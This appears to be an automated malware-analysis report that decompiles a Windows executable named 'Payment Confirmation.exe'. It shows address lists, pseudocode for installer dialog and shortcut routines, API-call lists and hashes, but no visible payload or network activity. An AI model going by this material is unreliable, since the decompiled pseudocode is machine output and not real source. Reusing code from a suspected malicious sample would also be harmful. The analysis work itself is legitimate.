                                                  0x00404c2d
                                                  0x00404c34
                                                  0x00404d81
                                                  0x00404d81
                                                  0x00404d88
                                                  0x00404d8a
                                                  0x00404d91
                                                  0x00404d95
                                                  0x00404da2
                                                  0x00404da2
                                                  0x00404da5
                                                  0x00404dab
                                                  0x00404dbd
                                                  0x00404dbd
                                                  0x00404d91
                                                  0x00000000
                                                  0x00404c3a
                                                  0x00404c3c
                                                  0x00404c41
                                                  0x00404c44
                                                  0x00404c48
                                                  0x00404c48
                                                  0x00404c4d
                                                  0x00404c50
                                                  0x00404c91
                                                  0x00404c93
                                                  0x00404c9d
                                                  0x00404ca3
                                                  0x00404ca6
                                                  0x00404cab
                                                  0x00404cb2
                                                  0x00404cb5
                                                  0x00404d57
                                                  0x00404d5d
                                                  0x00404d63
                                                  0x00404d68
                                                  0x00404d6b
                                                  0x00404d7c
                                                  0x00404d7c
                                                  0x00000000
                                                  0x00404cbb
                                                  0x00404cbb
                                                  0x00404cbb
                                                  0x00404cbe
                                                  0x00404cc4
                                                  0x00404cc7
                                                  0x00404cc9
                                                  0x00404ccb
                                                  0x00404ccd
                                                  0x00404cd0
                                                  0x00404cd3
                                                  0x00404cda
                                                  0x00404cdc
                                                  0x00404cdf
                                                  0x00404ce6
                                                  0x00404ce9
                                                  0x00404ce9
                                                  0x00404ce9
                                                  0x00404ce9
                                                  0x00404ced
                                                  0x00404cf0
                                                  0x00404cfc
                                                  0x00404cfd
                                                  0x00404d00
                                                  0x00404d02
                                                  0x00404d02
                                                  0x00404d02
                                                  0x00404cf2
                                                  0x00404cf4
                                                  0x00404cf4
                                                  0x00404d21
                                                  0x00404d21
                                                  0x00404d22
                                                  0x00404d2e
                                                  0x00404d3d
                                                  0x00404d3d
                                                  0x00404d3f
                                                  0x00404d42
                                                  0x00404d4b
                                                  0x00404d4b
                                                  0x00000000
                                                  0x00404cbe
                                                  0x00404c52
                                                  0x00404c5d
                                                  0x00404c60
                                                  0x00404c65
                                                  0x00404c67
                                                  0x00404c69
                                                  0x00404c6b
                                                  0x00404c7b
                                                  0x00404c85
                                                  0x00404c87
                                                  0x00404c8a
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00404c6d
                                                  0x00404c6d
                                                  0x00404c6d
                                                  0x00404c70
                                                  0x00404c73
                                                  0x00404c75
                                                  0x00404c75
                                                  0x00404c75
                                                  0x00404c76
                                                  0x00404c77
                                                  0x00404c77
                                                  0x00000000
                                                  0x00404c6d
                                                  0x00404c50
                                                  0x00404c34
                                                  0x00404b6b
                                                  0x00404b71
                                                  0x00000000
                                                  0x00000000
                                                  0x00404b7d
                                                  0x00404b81
                                                  0x00000000
                                                  0x00000000
                                                  0x00404b91
                                                  0x00404b93
                                                  0x00404b96
                                                  0x00000000
                                                  0x00000000
                                                  0x00404ba8
                                                  0x00404baa
                                                  0x00404bad
                                                  0x00404bb7
                                                  0x00404bb9
                                                  0x00404bba
                                                  0x00404bbb
                                                  0x00404bca
                                                  0x00404bcc
                                                  0x00404bd3
                                                  0x00404bd6
                                                  0x00000000
                                                  0x00404bd6
                                                  0x00404baf
                                                  0x00404bb2
                                                  0x00404bb5
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00404bb5
                                                  0x00000000
                                                  0x00404a75
                                                  0x00404827
                                                  0x0040482c
                                                  0x00404831
                                                  0x00404836
                                                  0x00404837
                                                  0x00404840
                                                  0x0040484b
                                                  0x00404856
                                                  0x0040485c
                                                  0x0040486a
                                                  0x0040487f
                                                  0x00404884
                                                  0x0040488f
                                                  0x00404898
                                                  0x004048ad
                                                  0x004048be
                                                  0x004048cb
                                                  0x004048cb
                                                  0x004048d0
                                                  0x004048d6
                                                  0x004048d8
                                                  0x004048db
                                                  0x004048e0
                                                  0x004048e5
                                                  0x004048e7
                                                  0x004048e7
                                                  0x00404907
                                                  0x00404907
                                                  0x00404909
                                                  0x0040490a
                                                  0x0040490f
                                                  0x00404912
                                                  0x00404915
                                                  0x00404919
                                                  0x0040491e
                                                  0x00404923
                                                  0x00404927
                                                  0x0040492c
                                                  0x00404931
                                                  0x00404933
                                                  0x00404935
                                                  0x0040493b
                                                  0x00404a05
                                                  0x00404a18
                                                  0x00000000
                                                  0x00404941
                                                  0x00404944
                                                  0x00404947
                                                  0x0040494a
                                                  0x0040494a
                                                  0x00404950
                                                  0x00404956
                                                  0x00404959
                                                  0x0040495f
                                                  0x00404960
                                                  0x00404965
                                                  0x0040496e
                                                  0x00404975
                                                  0x00404978
                                                  0x0040497b
                                                  0x0040497e
                                                  0x004049b8
                                                  0x004049ba
                                                  0x004049e3
                                                  0x004049bc
                                                  0x004049c9
                                                  0x004049c9
                                                  0x00404980
                                                  0x00404983
                                                  0x00404992
                                                  0x0040499c
                                                  0x004049a4
                                                  0x004049ab
                                                  0x004049b3
                                                  0x004049b3
                                                  0x0040497e
                                                  0x004049e9
                                                  0x004049ea
                                                  0x004049f0
                                                  0x004049f6
                                                  0x004049f6
                                                  0x00404a03
                                                  0x00404a1e
                                                  0x00404a22
                                                  0x00404a3f
                                                  0x00404a44
                                                  0x00404a47
                                                  0x00404a47
                                                  0x00000000
                                                  0x00404a24
                                                  0x00404a29
                                                  0x00404a32
                                                  0x00404dbf
                                                  0x00404dd1
                                                  0x00404dd1
                                                  0x00404a22
                                                  0x00000000
                                                  0x00404a03
                                                  0x0040493b

                                                  APIs
                                                  • GetDlgItem.USER32 ref: 004047EA
                                                  • GetDlgItem.USER32 ref: 004047F7
                                                  • GlobalAlloc.KERNEL32(00000040,00000003), ref: 00404843
                                                  • LoadBitmapA.USER32 ref: 00404856
                                                  • SetWindowLongA.USER32 ref: 00404870
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404884
                                                  • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404898
                                                  • SendMessageA.USER32(?,00001109,00000002), ref: 004048AD
                                                  • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004048B9
                                                  • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004048CB
                                                  • DeleteObject.GDI32(?), ref: 004048D0
                                                  • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004048FB
                                                  • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404907
                                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 0040499C
                                                  • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 004049C7
                                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 004049DB
                                                  • GetWindowLongA.USER32 ref: 00404A0A
                                                  • SetWindowLongA.USER32 ref: 00404A18
                                                  • ShowWindow.USER32(?,00000005), ref: 00404A29
                                                  • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404B2C
                                                  • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404B91
                                                  • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404BA6
                                                  • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404BCA
                                                  • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404BF0
                                                  • ImageList_Destroy.COMCTL32(?), ref: 00404C05
                                                  • GlobalFree.KERNEL32 ref: 00404C15
                                                  • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404C85
                                                  • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404D2E
                                                  • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404D3D
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00404D5D
                                                  • ShowWindow.USER32(?,00000000), ref: 00404DAB
                                                  • GetDlgItem.USER32 ref: 00404DB6
                                                  • ShowWindow.USER32(00000000), ref: 00404DBD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.366705430.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.366701235.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366711989.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366716712.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366728837.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366732375.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366736772.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                  • String ID: $M$N
                                                  • API String ID: 1638840714-813528018
                                                  • Opcode ID: dd6819aa1443f5cf7d51c2c88bee5c86e1a698ab9de6fee51b1062b3689a5351
                                                  • Instruction ID: 9a6d62add78faf2b4aa272e1cf177665df16ecedb9a61d3aa4425c18576eb247
                                                  • Opcode Fuzzy Hash: dd6819aa1443f5cf7d51c2c88bee5c86e1a698ab9de6fee51b1062b3689a5351
                                                  • Instruction Fuzzy Hash: 8B029DB0E00209AFDB24DF55DD45AAE7BB5EB84315F10817AF610BA2E1C7789A81CF58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00404292, Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 273stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 78%
                                                  			E00404292(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr _t124;
				intOrPtr* _t138;
				CHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x41fd08;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x425000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E0040543D(0x3fb, _t146);
					E00405DFA(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E0040543D(0x3fb, _t146);
							if(E0040576C(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E00405B98(0x41f500, _t146);
							_t87 = E00405F28(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00405B98(0x41f500, _t146);
								_t89 = E0040571F(0x41f500);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x41f500,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x41f500) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x41f500,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t159 = E004056D2(0x41f500) - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x41f500) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E00404726(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								_t147 =  *0x42371c; // 0x82d0fc
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E0040470E(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x41f4f0);
									} else {
										E00404649(_t168, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x423fe4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E00403E76(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x420524 == _t158) {
									E00404227();
								}
								 *0x420524 = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x420538;
							_v60 = E004045E3;
							_v56 = _t146;
							_v68 = E00405BBA(_t146, 0x420538, _t166, 0x41f908, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E0040568B(_t146);
								_t124 =  *0x423f50; // 0x825438
								_t125 =  *((intOrPtr*)(_t124 + 0x11c));
								if( *((intOrPtr*)(_t124 + 0x11c)) != 0 && _t146 == "C:\\Users\\engineer\\AppData\\Local\\Temp") {
									E00405BBA(_t146, 0x420538, _t166, 0, _t125);
									if(lstrcmpiA(0x422ee0, 0x420538) != 0) {
										lstrcatA(_t146, 0x422ee0);
									}
								}
								 *0x420524 =  *0x420524 + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E004056F8(_t146) != 0 && E0040571F(_t146) == 0) {
						E0040568B(_t146);
					}
					 *0x423718 = _t166;
					SetWindowTextA(_t165, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403E54(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403E54(_t166);
					E00403E89(_t165);
					_t138 = E00405F28(0xa);
					if(_t138 == 0) {
						L53:
						return E00403EBB(_a8, _a12, _a16);
					} else {
						 *_t138(_t165, 1);
						goto L8;
					}
				}
			}














































                                                  0x00404292
                                                  0x00404298
                                                  0x0040429e
                                                  0x004042ab
                                                  0x004042b9
                                                  0x004042bc
                                                  0x004042c4
                                                  0x004042ca
                                                  0x004042ca
                                                  0x004042d6
                                                  0x004042d9
                                                  0x00404347
                                                  0x0040434e
                                                  0x00404425
                                                  0x0040442c
                                                  0x0040443b
                                                  0x0040443b
                                                  0x0040443f
                                                  0x00404449
                                                  0x00404456
                                                  0x00404458
                                                  0x00404458
                                                  0x00404466
                                                  0x0040446d
                                                  0x00404474
                                                  0x00404477
                                                  0x004044ae
                                                  0x004044b0
                                                  0x004044b6
                                                  0x004044bb
                                                  0x004044bf
                                                  0x004044c1
                                                  0x004044c1
                                                  0x004044dd
                                                  0x00000000
                                                  0x004044df
                                                  0x004044e2
                                                  0x004044f0
                                                  0x004044f6
                                                  0x004044f7
                                                  0x004044fa
                                                  0x004044fd
                                                  0x00000000
                                                  0x004044fd
                                                  0x00404479
                                                  0x0040447b
                                                  0x0040447f
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00404481
                                                  0x00404481
                                                  0x0040448e
                                                  0x00404493
                                                  0x00000000
                                                  0x00000000
                                                  0x00404497
                                                  0x00404499
                                                  0x00404499
                                                  0x004044a4
                                                  0x004044a7
                                                  0x004044ac
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004044ac
                                                  0x00404509
                                                  0x00404513
                                                  0x00404516
                                                  0x00404519
                                                  0x00404520
                                                  0x00404520
                                                  0x00404522
                                                  0x00404522
                                                  0x00404527
                                                  0x00404529
                                                  0x00404531
                                                  0x00404538
                                                  0x0040453a
                                                  0x00404545
                                                  0x00404545
                                                  0x0040453a
                                                  0x0040454c
                                                  0x00404555
                                                  0x0040455f
                                                  0x00404567
                                                  0x00404582
                                                  0x00404569
                                                  0x00404572
                                                  0x00404572
                                                  0x00404567
                                                  0x00404587
                                                  0x0040458c
                                                  0x00404591
                                                  0x0040459a
                                                  0x0040459a
                                                  0x004045a3
                                                  0x004045a5
                                                  0x004045a5
                                                  0x004045b1
                                                  0x004045b9
                                                  0x004045c3
                                                  0x004045c3
                                                  0x004045c8
                                                  0x00000000
                                                  0x004045c8
                                                  0x00404477
                                                  0x0040442e
                                                  0x00404435
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00404435
                                                  0x00404354
                                                  0x0040435d
                                                  0x00404377
                                                  0x0040437c
                                                  0x00404386
                                                  0x0040438d
                                                  0x00404399
                                                  0x0040439c
                                                  0x0040439f
                                                  0x004043a6
                                                  0x004043ae
                                                  0x004043b1
                                                  0x004043b5
                                                  0x004043bc
                                                  0x004043c4
                                                  0x0040441e
                                                  0x004043c6
                                                  0x004043c7
                                                  0x004043ce
                                                  0x004043d3
                                                  0x004043d8
                                                  0x004043e0
                                                  0x004043ed
                                                  0x00404401
                                                  0x00404405
                                                  0x00404405
                                                  0x00404401
                                                  0x0040440a
                                                  0x00404417
                                                  0x00404417
                                                  0x004043c4
                                                  0x00000000
                                                  0x0040437c
                                                  0x0040436a
                                                  0x00000000
                                                  0x00000000
                                                  0x00404370
                                                  0x00000000
                                                  0x004042db
                                                  0x004042e8
                                                  0x004042f1
                                                  0x004042fe
                                                  0x004042fe
                                                  0x00404305
                                                  0x0040430b
                                                  0x00404314
                                                  0x00404317
                                                  0x0040431a
                                                  0x00404322
                                                  0x00404325
                                                  0x00404328
                                                  0x0040432e
                                                  0x00404335
                                                  0x0040433c
                                                  0x004045ce
                                                  0x004045e0
                                                  0x00404342
                                                  0x00404345
                                                  0x00000000
                                                  0x00404345
                                                  0x0040433c

                                                  APIs
                                                  • GetDlgItem.USER32 ref: 004042E1
                                                  • SetWindowTextA.USER32(00000000,?), ref: 0040430B
                                                  • SHBrowseForFolderA.SHELL32(?,0041F908,?), ref: 004043BC
                                                  • CoTaskMemFree.OLE32(00000000), ref: 004043C7
                                                  • lstrcmpiA.KERNEL32(naqeld,00420538,00000000,?,?), ref: 004043F9
                                                  • lstrcatA.KERNEL32(?,naqeld), ref: 00404405
                                                  • SetDlgItemTextA.USER32 ref: 00404417
                                                    • Part of subcall function 0040543D: GetDlgItemTextA.USER32 ref: 00405450
                                                    • Part of subcall function 00405DFA: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Payment Confirmation.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030D6,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405E52
                                                    • Part of subcall function 00405DFA: CharNextA.USER32(?,?,?,00000000), ref: 00405E5F
                                                    • Part of subcall function 00405DFA: CharNextA.USER32(?,"C:\Users\user\Desktop\Payment Confirmation.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030D6,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405E64
                                                    • Part of subcall function 00405DFA: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030D6,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405E74
                                                  • GetDiskFreeSpaceA.KERNEL32(0041F500,?,?,0000040F,?,0041F500,0041F500,?,00000001,0041F500,?,?,000003FB,?), ref: 004044D5
                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004044F0
                                                    • Part of subcall function 00404649: lstrlenA.KERNEL32(00420538,00420538,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404564,000000DF,00000000,00000400,?), ref: 004046E7
                                                    • Part of subcall function 00404649: wsprintfA.USER32 ref: 004046EF
                                                    • Part of subcall function 00404649: SetDlgItemTextA.USER32 ref: 00404702
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.366705430.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.366701235.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366711989.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366716712.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366728837.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366732375.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366736772.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: A$C:\Users\user\AppData\Local\Temp$naqeld
                                                  • API String ID: 2624150263-990064265
                                                  • Opcode ID: fb58f5be01c1fbab376fe3aca88381438e011d3cf0c95fbb8aa79c4ccef87f62
                                                  • Instruction ID: cfccd4b73e861dd9bc9b7885d3f414f2f86db1ffcc16c92a650f1104495a78a5
                                                  • Opcode Fuzzy Hash: fb58f5be01c1fbab376fe3aca88381438e011d3cf0c95fbb8aa79c4ccef87f62
                                                  • Instruction Fuzzy Hash: EAA17EB1D00218BBDB11AFA5CD41AAFB6B8EF84315F10813BF605B62D1D77C9A418F69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00402053, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134comCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 74%
                                                  			E00402053() {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E00402A29(0xfffffff0);
				_t96 = E00402A29(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x34)) = E00402A29(2);
				 *((intOrPtr*)(_t100 - 0xc)) = E00402A29(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x38)) = E00402A29(0x45);
				if(E004056F8(_t96) == 0) {
					E00402A29(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x4073f8, _t75, 1, 0x4073e8, _t44);
				if(_t44 < _t75) {
					L13:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407408, _t100 - 8);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\engineer\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x18);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x18);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 0xc)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 0xc)),  *(_t100 - 0x18) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x34)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x38)));
						if(_t95 >= _t75) {
							_t95 = 0x80004005;
							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409408, 0x400) != 0) {
								_t69 =  *((intOrPtr*)(_t100 - 8));
								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409408, 1);
							}
						}
						_t66 =  *((intOrPtr*)(_t100 - 8));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L13;
					}
				}
				E00401423();
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}





















                                                  0x0040205c
                                                  0x00402066
                                                  0x0040206f
                                                  0x00402079
                                                  0x00402082
                                                  0x0040208c
                                                  0x00402090
                                                  0x00402090
                                                  0x00402095
                                                  0x004020a6
                                                  0x004020ae
                                                  0x0040218e
                                                  0x0040218e
                                                  0x00402195
                                                  0x004020b4
                                                  0x004020b4
                                                  0x004020c5
                                                  0x004020c9
                                                  0x004020cf
                                                  0x004020d9
                                                  0x004020db
                                                  0x004020e6
                                                  0x004020e9
                                                  0x004020f6
                                                  0x004020f8
                                                  0x004020fa
                                                  0x00402101
                                                  0x00402104
                                                  0x00402104
                                                  0x00402107
                                                  0x00402111
                                                  0x00402119
                                                  0x0040211e
                                                  0x0040212a
                                                  0x0040212a
                                                  0x0040212d
                                                  0x00402136
                                                  0x00402139
                                                  0x00402142
                                                  0x00402147
                                                  0x00402159
                                                  0x00402168
                                                  0x0040216a
                                                  0x00402176
                                                  0x00402176
                                                  0x00402168
                                                  0x00402178
                                                  0x0040217e
                                                  0x0040217e
                                                  0x00402181
                                                  0x00402187
                                                  0x0040218c
                                                  0x004021a1
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040218c
                                                  0x00402197
                                                  0x004028c1
                                                  0x004028cd

                                                  APIs
                                                  • CoCreateInstance.OLE32(004073F8,?,00000001,004073E8,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020A6
                                                  • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409408,00000400,?,00000001,004073E8,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402160
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp, xrefs: 004020DE
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.366705430.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.366701235.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366711989.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366716712.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366728837.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366732375.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366736772.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: ByteCharCreateInstanceMultiWide
                                                  • String ID: C:\Users\user\AppData\Local\Temp
                                                  • API String ID: 123533781-1104044542
                                                  • Opcode ID: 089d45c0d23cda86f3d168a15e68d27aa0b28459bfa4feaba1da871340bdcdc6
                                                  • Instruction ID: c7e9304a010c998f9a7959bd005017a1970e80d3ce8bb7043a01564e87abbd95
                                                  • Opcode Fuzzy Hash: 089d45c0d23cda86f3d168a15e68d27aa0b28459bfa4feaba1da871340bdcdc6
                                                  • Instruction Fuzzy Hash: 32416E75A00205BFCB00DFA8CD88E9E7BB5EF49354F204169F905EB2D1CA799C41CB94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 10009B80, Relevance: 3.0, APIs: 2, Instructions: 8COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E10009B80(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				return UnhandledExceptionFilter(_a4);
			}



                                                  0x10009b85
                                                  0x10009b95

                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,100083C0,?,?,?,00000001), ref: 10009B85
                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 10009B8E
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.368543351.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.368523282.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368638244.0000000010014000.00000002.00020000.sdmp Download File
